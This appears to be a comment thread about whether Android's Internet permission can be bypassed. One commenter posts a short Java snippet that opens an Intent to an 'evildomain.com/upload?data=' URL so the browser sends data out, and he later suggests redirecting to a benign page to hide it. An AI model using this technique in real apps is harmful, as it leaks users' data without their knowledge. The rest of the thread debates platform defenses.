← Back to context

Comment by UncleMeat

21 days ago

> I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it.

   Uri uri = Uri.parse("https://evildomain.com/upload?data=DATA_GOES_HERE);
   Intent i = new Intent(Intent.ACTION_VIEW, uri);
   startActivity(i);

Happily uses the browser app to do the data send for you. Requiring apps to have all the permissions of the recipient of an Intent before being allowed to send it would be a catastrophic change to the ecosystem.

10 comments

UncleMeat

Reply
broker354690  21 days ago

> would be a catastrophic change to the ecosystem.

Hey we were already on board with this, you don't have to convince us.

  • UncleMeat  21 days ago

    The effect of this would be to make all apps request all permissions because even if you are just using some other app for a particular feature you need, you have no control over what other permissions they might add which would suddenly break any intents you send them. The only defense would be to request everything.

    You could very specifically ban ACTION_VIEW intents for web URIs from apps without an internet permission I guess. But does banning apps from linking to the web (to be opened in browsers) really seem like a good idea?

    • ycombinatrix  21 days ago

      Similar changes have been done before, the security sandbox behaves differently based on the app's minimum/target API level for backwards compatibility.

      That's also why there's a warning before installing really old apps, they may run with extra permissions.

noname120  20 days ago

I don’t see why you couldn’t disallow opening URL intents. App intents that enable to exfiltrate data should be cracked down on by Google, it’s basically a privilege escalation.

  • UncleMeat  20 days ago

    "No links to web uris allowed" would be a pretty intense restriction. Now the free calculator can't even link to the paid version on the app store. There's already precious few apps that don't really need internet access (usually simple tools apps that don't have ads) and this even further limits that set.

sterlind  21 days ago

so? pop up a permission prompt. have the user confirm.

and isn't it immediately apparent that the app is leaking data if your calculator is popping a webview?

  • UncleMeat  21 days ago

    "Pop up a permission prompt every single time an app links out to a browser" is not going to be a thing that users like.

    Yes, this is a little suspicious. But you just have the evil page redirect to google.com or something benign. To the user it looks like "huh, chrome just opened on its own."